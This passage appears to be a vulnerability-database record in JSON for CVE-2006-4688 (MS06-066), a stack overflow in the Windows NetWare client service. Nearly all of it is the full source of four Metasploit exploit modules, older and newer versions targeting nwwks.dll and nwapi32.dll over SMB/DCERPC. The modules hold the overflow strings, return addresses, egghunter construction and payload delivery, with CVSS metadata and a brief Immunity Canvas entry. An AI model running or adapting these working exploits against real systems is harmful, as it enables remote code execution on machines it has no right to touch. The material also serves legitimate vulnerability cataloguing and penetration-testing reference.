"https://www.exploit-db.com/exploits/16369/", "sourceData": "##\r\n# $Id: ms06_066_nwwks.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Services MS06-066 nwwks.dll',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\r\n\t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'pusscat' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-4688'],\r\n\t\t\t\t\t[ 'OSVDB', '30260'],\r\n\t\t\t\t\t[ 'BID', '21023'],\r\n\t\t\t\t\t[ 'MSB', 'MS06-066'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t# -ws2ord XXX?\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP SP2',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Nov 14 2006'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('SMBPIPE', [ true, \"The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)\", 'nwwks']),\r\n\t\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# [in] [unique] wchar *\r\n\t\t# [in] [unique] wchar *\r\n\t\t# [out] long\r\n\r\n\t\tofstring = Rex::Text.to_unicode('\\\\\\\\') + rand_text(292) + [ target.ret ].pack('V') + \"\\x00\\x00\"\r\n\t\tstubdata =\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") +\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + \"\\x00\\x00\") +\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") +\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") +\r\n\t\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(ofstring)\r\n\r\n\t\tprint_status(\"Connecting to the SMB service...\")\r\n\t\tconnect()\r\n\t\tsmb_login()\r\n\r\n\t\thandle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tdcerpc.call(0x01, stubdata)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\t\tprint_status('Server did not respond, this is expected')\r\n\t\trescue => e\r\n\t\t\tif e.to_s =~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\tprint_status('Server disconnected, this is expected')\r\n\t\t\telse\r\n\t\t\t\traise e\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}\")\r\n\t\tend\r\n\r\n\t\t# Cleanup\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\t\tif (dcerpc.last_response != nil and\r\n\t\t\tdcerpc.last_response.stub_data != nil and\r\n\t\t\tdcerpc.last_response.stub_data == \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\")\r\n\t\t\treturn true\r\n\t\telse\r\n\t\t\treturn false\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16369/"}, {"lastseen": "2016-02-01T23:43:24", "description": "Microsoft Services MS06-066 nwapi32.dll. CVE-2006-4688. Remote exploit for windows platform", "published": "2010-08-25T00:00:00", "type": "exploitdb", "title": "Microsoft Services - nwapi32.dll MS06-066", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "modified": "2010-08-25T00:00:00", "id": "EDB-ID:16373", "href": "https://www.exploit-db.com/exploits/16373/", "sourceData": "##\r\n# $Id: ms06_066_nwapi.rb 10150 2010-08-25 20:55:37Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Egghunter\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Services MS06-066 nwapi32.dll',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the svchost service, when the netware\r\n\t\t\t\tclient service is running. This specific vulnerability is in the nwapi32.dll module.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'pusscat' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 10150 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2006-4688'],\r\n\t\t\t\t\t[ 'OSVDB', '30260'],\r\n\t\t\t\t\t[ 'BID', '21023'],\r\n\t\t\t\t\t[ 'MSB', 'MS06-066'],\r\n\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 296,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t# -ws2ord XXX?\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Windows XP SP2',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x00EBEEEC ,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Nov 14 2006'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('SMBPIPE', [ true, \"The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)\", 'srvsvc']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# [in] [unique] wchar *\r\n\t\t# [in] wchar *\r\n\t\t# [in, out] long\r\n\t\t# [out] handle\r\n\r\n\t\t# Generate the egghunter payload\r\n\t\thunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })\r\n\t\tegg = hunter[1]\r\n\t\t#print_status(\"Today, we'll be hunting for 0x#{egg.unpack(\"V\")[0]}\")\r\n\r\n\t\t# Add giant blocks of guard data before and after the egg\r\n\t\teggdata =\r\n\t\t\trand_text(1024) +\r\n\t\t\t\tegg +\r\n\t\t\trand_text(1024)\r\n\r\n\t\tbuflen = 295\r\n\t\tofstring\t= Rex::Text.to_unicode('\\\\\\\\') + \"\\x90\" + hunter[0] + rand_text(buflen-hunter[0].length) +\r\n\t\t\t[ target.ret ].pack('V') + \"\\x00\"\r\n\t\t#ofstring\t= Rex::Text.to_unicode('\\\\\\\\') + payload.encoded + [ target.ret ].pack('V') + \"\\x00\\x00\"\r\n\r\n\t\tstubdata =\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t\tNDR.UnicodeConformantVaryingString(\"\\\\\\\\BBBB\") +\r\n\t\t\tNDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE!\r\n\t\t\t#NDR.UnicodeConformantVaryingString('\\\\\\\\' + \"A\"*1024 + \"\\x00\") +\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\tNDR.long(rand(0xffffffff)) +\r\n\t\t\t#NDR.long((ofstring.length * 2) + 0xC) +\r\n\t\t\teggdata\r\n\r\n\t\tprint_status(\"Connecting to the SMB service...\")\r\n\t\tconnect()\r\n\t\tsmb_login()\r\n\r\n\t\thandle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tdcerpc.call(0x09, stubdata)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\t\tprint_status('Server did not respond, this is expected')\r\n\t\trescue => e\r\n\t\t\tif e.to_s =~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\tprint_status('Server disconnected, this is expected')\r\n\t\t\telse\r\n\t\t\t\traise e\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tprint_status(\"Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}\")\r\n\t\tend\r\n\r\n\t\t# Cleanup\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\t\tif (dcerpc.last_response != nil and\r\n\t\t\tdcerpc.last_response.stub_data != nil and\r\n\t\t\tdcerpc.last_response.stub_data == \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\")\r\n\t\t\treturn true\r\n\t\telse\r\n\t\t\treturn false\r\n\t\tend\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16373/"}], "metasploit": [{"lastseen": "2020-08-18T00:42:27", "description": "This module exploits a stack buffer overflow in the svchost service when the netware client service is running. This specific vulnerability is in the nwapi32.dll module.\n", "published": "2006-11-15T17:27:36", "type": "metasploit", "title": "MS06-066 Microsoft Services nwapi32.dll Module Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS06_066_NWAPI", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Egghunter\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-066 Microsoft Services nwapi32.dll Module Exploit',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the svchost service when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.\n },\n 'Author' => [ 'pusscat' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-4688'],\n [ 'OSVDB', '30260'],\n [ 'BID', '21023'],\n [ 'MSB', 'MS06-066'],\n\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 296,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n # -ws2ord XXX?\n },\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows XP SP2',\n {\n 'Ret' => 0x00EBEEEC ,\n },\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 14 2006'))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ true, \"The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)\", 'srvsvc']),\n ])\n end\n\n def exploit\n # [in] [unique] wchar *\n # [in] wchar *\n # [in, out] long\n # [out] handle\n\n # Generate the egghunter payload\n hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })\n egg = hunter[1]\n #print_status(\"Today, we'll be hunting for 0x#{egg.unpack(\"V\")[0]}\")\n\n # Add giant blocks of guard data before and after the egg\n eggdata =\n rand_text(1024) +\n egg +\n rand_text(1024)\n\n buflen = 295\n ofstring\t= Rex::Text.to_unicode('\\\\\\\\') + \"\\x90\" + hunter[0] + rand_text(buflen-hunter[0].length) +\n [ target.ret ].pack('V') + \"\\x00\"\n #ofstring\t= Rex::Text.to_unicode('\\\\\\\\') + payload.encoded + [ target.ret ].pack('V') + \"\\x00\\x00\"\n\n stubdata =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString(\"\\\\\\\\BBBB\") +\n NDR.UnicodeConformantVaryingStringPreBuilt(ofstring) + # HERE!\n #NDR.UnicodeConformantVaryingString('\\\\\\\\' + \"A\"*1024 + \"\\x00\") +\n NDR.long(rand(0xffffffff)) +\n NDR.long(rand(0xffffffff)) +\n #NDR.long((ofstring.length * 2) + 0xC) +\n eggdata\n\n print_status(\"Connecting to the SMB service...\")\n connect()\n smb_login()\n\n handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n print_status(\"Calling the vulnerable function...\")\n\n begin\n dcerpc.call(0x09, stubdata)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n print_status('Server did not respond, this is expected')\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n else\n raise e\n end\n else\n print_status(\"Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}\")\n end\n\n # Cleanup\n handler\n disconnect\n\n if (dcerpc.last_response != nil and\n dcerpc.last_response.stub_data != nil and\n dcerpc.last_response.stub_data == \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\")\n return true\n else\n return false\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms06_066_nwapi.rb"}, {"lastseen": "2020-10-02T02:47:23", "description": "This module exploits a stack buffer overflow in the svchost service, when the netware client service is running. This specific vulnerability is in the nwapi32.dll module.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "MS06-066 Microsoft Services nwwks.dll Module Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS06_066_NWWKS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS06-066 Microsoft Services nwwks.dll Module Exploit',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the svchost service, when the netware\n client service is running. This specific vulnerability is in the nwapi32.dll module.\n },\n 'Author' => [ 'pusscat' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-4688'],\n [ 'OSVDB', '30260'],\n [ 'BID', '21023'],\n [ 'MSB', 'MS06-066'],\n\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\",\n 'Compat' =>\n {\n # -ws2ord XXX?\n },\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows XP SP2',\n {\n 'Ret' => 0x616566fb, # modemui.dll [esp + 16]: popaw, ret\n },\n ]\n ],\n\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Nov 14 2006'))\n\n register_options(\n [\n OptString.new('SMBPIPE', [ true, \"The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)\", 'nwwks']),\n ])\n\n end\n\n def exploit\n # [in] [unique] wchar *\n # [in] [unique] wchar *\n # [out] long\n\n ofstring = Rex::Text.to_unicode('\\\\\\\\') + rand_text(292) + [ target.ret ].pack('V') + \"\\x00\\x00\"\n stubdata =\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") +\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingStringPreBuilt(payload.encoded + \"\\x00\\x00\") +\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") +\n NDR.long(rand(0xffffffff)) +\n NDR.UnicodeConformantVaryingString(rand_text(rand(128)) + \"\\x00\") +\n NDR.UnicodeConformantVaryingStringPreBuilt(ofstring)\n\n print_status(\"Connecting to the SMB service...\")\n connect()\n smb_login()\n\n handle = dcerpc_handle('e67ab081-9844-3521-9d32-834f038001c0', '1.0', 'ncacn_np', [\"\\\\#{datastore['SMBPIPE']}\"])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n\n print_status(\"Calling the vulnerable function...\")\n\n begin\n dcerpc.call(0x01, stubdata)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse\n print_status('Server did not respond, this is expected')\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n else\n raise e\n end\n else\n print_status(\"Got #{dcerpc.last_response.stub_data.length} bytes: #{dcerpc.last_response.stub_data}\")\n end\n\n # Cleanup\n handler\n disconnect\n\n if (dcerpc.last_response != nil and\n dcerpc.last_response.stub_data != nil and\n dcerpc.last_response.stub_data == \"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\")\n return true\n else\n return false\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms06_066_nwwks.rb"}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4688"], "description": "**Name**| ms06_066 \n---|--- \n**CVE**| CVE-2006-4688 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Microsoft Netware RPC Interface Overflow \n**Notes**| References: http://www.microsoft.com/technet/security/bulletin/ms06-066.mspx \nCVE Name: CVE-2006-4688 \nVENDOR: Microsoft \nMSADV: MS06-066 \nRepeatability: One shot \nNote: \nDate public: 11-14-2006 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4688 \nCVSS: 7.5 \n\n", "edition": 2, "modified": "2006-11-14T22:07:00", "published": "2006-11-14T22:07:00", "id": "MS06_066", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms06_066", "type": "canvas", "title": "Immunity Canvas: MS06_066", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}